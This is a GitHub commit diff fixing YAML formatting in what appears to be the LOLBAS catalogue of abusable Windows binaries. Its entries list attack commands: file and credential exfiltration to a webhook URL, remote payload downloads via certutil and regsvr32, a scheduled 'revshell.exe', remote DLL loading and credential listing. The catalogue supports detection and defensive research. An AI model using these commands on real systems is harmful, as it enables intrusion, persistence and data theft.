Merge pull request #122 from wietze/fixing-yaml-issues

Fixing yaml issues
This commit is contained in:
Oddvar Moe 2021-10-22 14:56:14 +02:00 committed by GitHub
commit 19a8d5ac08
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
149 changed files with 960 additions and 954 deletions

View File

@ -2,7 +2,7 @@
Name: Binary.exe Name: Binary.exe
Description: Something general about the binary Description: Something general about the binary
Author: The person that created this file Author: The person that created this file
Created: Date the person created this file Created: Date the person created this file (use YYYY-MM-DD without quotes)
Commands: Commands:
- Command: The command - Command: The command
Description: Description of the command Description: Description of the command
@ -34,7 +34,7 @@ Resources:
- Link: Threatintelreport... - Link: Threatintelreport...
Acknowledgement: Acknowledgement:
- Person: John Doe - Person: John Doe
Handle: @johndoe Handle: '@johndoe'
- Person: Ola Norman - Person: Ola Norman
Handle: @olaNor Handle: '@olaNor'
--- ---

View File

@ -2,8 +2,7 @@
Name: Explorer.exe Name: Explorer.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: explorer.exe calc.exe - Command: explorer.exe calc.exe
Description: 'Executes calc.exe as a subprocess of explorer.exe.' Description: 'Executes calc.exe as a subprocess of explorer.exe.'
@ -14,5 +13,7 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/bohops/status/986984122563391488 - https://twitter.com/bohops/status/986984122563391488
Notes: Thanks to Jimmy - @bohops Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -2,8 +2,7 @@
Name: Netsh.exe Name: Netsh.exe
Description: Execute, Surveillance Description: Execute, Surveillance
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: | - Command: |
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>) netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
@ -22,5 +21,3 @@ Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128 - https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873 - https://twitter.com/teemuluotio/status/990532938952527873
Notes: ''

View File

@ -2,8 +2,7 @@
Name: Nltest.exe Name: Nltest.exe
Description: Credentials Description: Credentials
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
Description: '' Description: ''
@ -14,4 +13,6 @@ Detection: []
Resources: Resources:
- https://twitter.com/sysopfb/status/986799053668139009 - https://twitter.com/sysopfb/status/986799053668139009
- https://ss64.com/nt/nltest.html - https://ss64.com/nt/nltest.html
Notes: Thanks to Sysopfb - @sysopfb Acknowledgement:
- Person: Sysopfb
Handle: '@sysopfb'

View File

@ -2,8 +2,7 @@
Name: Openwith.exe Name: Openwith.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: OpenWith.exe /c C:\test.hta - Command: OpenWith.exe /c C:\test.hta
Description: Opens the target file with the default application. Description: Opens the target file with the default application.
@ -16,5 +15,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/harr0ey/status/991670870384021504 - https://twitter.com/harr0ey/status/991670870384021504
Notes: Thanks to Matt harr0ey - @harr0ey Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'

View File

@ -2,8 +2,7 @@
Name: Powershell.exe Name: Powershell.exe
Description: Execute, Read ADS Description: Execute, Read ADS
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: powershell -ep bypass - < c:\temp:ttt - Command: powershell -ep bypass - < c:\temp:ttt
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
@ -14,5 +13,7 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752 - https://twitter.com/Moriarty_Meng/status/984380793383370752
Notes: Thanks to Moriarty - @Moriarty_Meng Acknowledgement:
- Person: Moriarty
Handle: '@Moriarty_Meng'

View File

@ -2,8 +2,7 @@
Name: Psr.exe Name: Psr.exe
Description: Surveillance Description: Surveillance
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: psr.exe /start /gui 0 /output c:\users\user\out.zip - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
Description: Capture screenshots of the desktop and save them in the target .ZIP file. Description: Capture screenshots of the desktop and save them in the target .ZIP file.
@ -18,5 +17,4 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Notes: 'Thanks to '

View File

@ -2,8 +2,7 @@
Name: Robocopy.exe Name: Robocopy.exe
Description: Copy Description: Copy
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
Description: Copy the entire contents of the SourceFolder to the DestFolder. Description: Copy the entire contents of the SourceFolder to the DestFolder.
@ -16,5 +15,3 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
Notes: Thanks to Name of guy - @twitterhandle

View File

@ -2,8 +2,7 @@
Name: AcroRd32.exe Name: AcroRd32.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/997997818362155008 - https://twitter.com/pabraeken/status/997997818362155008
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Gpup.exe Name: Gpup.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Description: Execute another command through gpup.exe (Notepad++ binary). Description: Execute another command through gpup.exe (Notepad++ binary).
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/997892519827558400 - https://twitter.com/pabraeken/status/997892519827558400
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nlnotes.exe Name: Nlnotes.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes. Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources: Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808 - https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Notes.exe Name: Notes.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes. Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources: Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808 - https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Nvudisp.exe Name: Nvudisp.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Nvudisp.exe System calc.exe - Command: Nvudisp.exe System calc.exe
Description: Execute calc.exe as a subprocess. Description: Execute calc.exe as a subprocess.
@ -23,4 +22,7 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nvuhda6.exe Name: Nvuhda6.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: nvuhda6.exe System calc.exe - Command: nvuhda6.exe System calc.exe
Description: Execute calc.exe as a subprocess. Description: Execute calc.exe as a subprocess.
@ -23,4 +22,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
Notes: Thanks to Adam - @hexacorn Acknowledgement:
- Person: Adam
Handle: '@hexacorn'

View File

@ -2,8 +2,7 @@
Name: ROCCAT_Swarm.exe Name: ROCCAT_Swarm.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/994213164484001793 - https://twitter.com/pabraeken/status/994213164484001793
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -21,7 +21,7 @@ Detection:
Resources: Resources:
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
- Link: https://twitter.com/bartblaze/status/1107390776147881984 - Link: https://twitter.com/bartblaze/status/1107390776147881984
Acknowledgement: Acknowledgement:
- Person: Bart - Person: Bart
Handle: @bartblaze Handle: '@bartblaze'
--- ---

View File

@ -2,8 +2,7 @@
Name: Setup.exe Name: Setup.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Run Setup.exe - Command: Run Setup.exe
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/994381620588236800 - https://twitter.com/pabraeken/status/994381620588236800
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Usbinst.exe Name: Usbinst.exe
Description: Execute Description: Execute
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Description: Execute calc.exe through DefaultInstall Section Directive in INF file. Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/993514357807108096 - https://twitter.com/pabraeken/status/993514357807108096
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: VBoxDrvInst.exe Name: VBoxDrvInst.exe
Description: Persistence Description: Persistence
Author: '' Author: ''
Created: '2018-05-25' Created: 2018-05-25
Categories: []
Commands: Commands:
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: [] Detection: []
Resources: Resources:
- https://twitter.com/pabraeken/status/993497996179492864 - https://twitter.com/pabraeken/status/993497996179492864
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -1,20 +1,18 @@
Name: aswrundll.exe Name: aswrundll.exe
Description: This process is used by AVAST antivirus to run and execute any modules Description: This process is used by AVAST antivirus to run and execute any modules
Author: Eli Salem Author: Eli Salem
Created: 19\03\2019 Created: 2019-03-19
Commands: Commands:
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" - Command: "\"C:\\Program Files\\Avast Software\\Avast\\aswrundll\" \"C:\\Users\\Public\\Libraries\\tempsys\\module.dll\""
Description: Load and execute modules using aswrundll Description: Load and execute modules using aswrundll
Usecase: Execute malicious modules using aswrundll.exe Usecase: Execute malicious modules using aswrundll.exe
Category: Execute Category: Execute
Privileges: Any Privileges: Any
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Program Files\Avast Software\Avast\aswrundll - Path: C:\Program Files\Avast Software\Avast\aswrundll
Code_Sample:
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
Resources: Resources:
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
Acknowledgement: Acknowledgement:
- Person: Eli Salem - Person: Eli Salem
handle: https://www.linkedin.com/in/eli-salem-954728150 Handle: https://www.linkedin.com/in/eli-salem-954728150

View File

@ -2,7 +2,7 @@
Name: winword.exe Name: winword.exe
Description: Document editor included with Microsoft Office. Description: Document editor included with Microsoft Office.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: winword.exe /l dllfile.dll - Command: winword.exe /l dllfile.dll
Description: Launch DLL payload. Description: Launch DLL payload.
@ -10,7 +10,7 @@ Commands:
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
MItreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

View File

@ -2,18 +2,18 @@
Name: testxlst.js Name: testxlst.js
Description: Script included with Pywin32. Description: Script included with Pywin32.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution Category: Execution
Privileges: User Privileges: User
MitreID: T1064 MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064
OperatingSystem: Windows OperatingSystem: Windows
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution Category: Execution
Privileges: User Privileges: User
MitreID: T1064 MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064 MitreLink: https://attack.mitre.org/wiki/Technique/T1064
@ -25,4 +25,6 @@ Detection: []
Resources: Resources:
- https://twitter.com/bohops/status/993314069116485632 - https://twitter.com/bohops/status/993314069116485632
- https://github.com/mhammond/pywin32 - https://github.com/mhammond/pywin32
Notes: Thanks to Jimmy - @bohops Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -2,7 +2,7 @@
Name: At.exe Name: At.exe
Description: Schedule periodic tasks Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith' Author: 'Freddie Barr-Smith'
Created: '2019-09-20' Created: 2019-09-20
Commands: Commands:
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Description: Create a recurring task to execute every day at a specific time. Description: Create a recurring task to execute every day at a specific time.

View File

@ -2,7 +2,7 @@
Name: Atbroker.exe Name: Atbroker.exe
Description: Helper binary for Assistive Technology (AT) Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: ATBroker.exe /start malware - Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT). Description: Start a registered Assistive Technology (AT).

View File

@ -2,7 +2,7 @@
Name: Bash.exe Name: Bash.exe
Description: File used by Windows subsystem for Linux Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe

View File

@ -2,7 +2,7 @@
Name: Bitsadmin.exe Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.

View File

@ -2,7 +2,7 @@
Name: CertReq.exe Name: CertReq.exe
Description: Used for requesting and managing certificates Description: Used for requesting and managing certificates
Author: 'David Middlehurst' Author: 'David Middlehurst'
Created: '2020-07-07' Created: 2020-07-07
Commands: Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory

View File

@ -2,7 +2,7 @@
Name: Certutil.exe Name: Certutil.exe
Description: Windows binary used for handling certificates Description: Windows binary used for handling certificates
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder. Description: Download and save 7zip to disk in the current folder.

View File

@ -2,7 +2,7 @@
Name: Cmd.exe Name: Cmd.exe
Description: The command-line interpreter in Windows Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut' Author: 'Ye Yint Min Thu Htut'
Created: '2019-06-26' Created: 2019-06-26
Commands: Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Description: Add content to an Alternate Data Stream (ADS). Description: Add content to an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Cmdkey.exe Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials. Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cmdkey /list - Command: cmdkey /list
Description: List cached credentials Description: List cached credentials

View File

@ -2,7 +2,7 @@
Name: Cmstp.exe Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile. Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

View File

@ -2,7 +2,7 @@
Name: ConfigSecurityPolicy.exe Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: 'Ialle Teixeira' Author: 'Ialle Teixeira'
Created: '04/09/2020' Created: 2020-09-04
Commands: Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general Description: Upload file, credentials or data exfiltration in general

View File

@ -2,7 +2,7 @@
Name: Control.exe Name: Control.exe
Description: Binary used to launch controlpanel items in Windows Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll - Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Csc.exe Name: Csc.exe
Description: Binary file used by .NET to compile C# code Description: Binary file used by .NET to compile C# code
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: csc.exe -out:My.exe File.cs - Command: csc.exe -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.

View File

@ -2,7 +2,7 @@
Name: Cscript.exe Name: Cscript.exe
Description: Binary used to execute scripts in Windows Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cscript c:\ads\file.txt:script.vbs - Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Desktopimgdownldr.exe Name: Desktopimgdownldr.exe
Description: Windows binary used to configure lockscreen/desktop image Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal Author: Gal Kristal
Created: 28/06/2020 Created: 2020-06-28
Commands: Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen Description: Downloads the file and sets it as the computer's lockscreen

View File

@ -2,7 +2,7 @@
Name: Dfsvc.exe Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url Description: Executes click-once-application from Url

View File

@ -2,7 +2,7 @@
Name: Diantz.exe Name: Diantz.exe
Description: Binary that package existing files into a cabinet (.cab) file Description: Binary that package existing files into a cabinet (.cab) file
Author: 'Tamir Yehuda' Author: 'Tamir Yehuda'
Created: '08/08/2020' Created: 2020-08-08
Commands: Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Diskshadow.exe Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt - Command: diskshadow.exe /s c:\test\diskshadow.txt
Description: Execute commands using diskshadow.exe from a prepared diskshadow script. Description: Execute commands using diskshadow.exe from a prepared diskshadow script.

View File

@ -2,7 +2,7 @@
Name: Dnscmd.exe Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
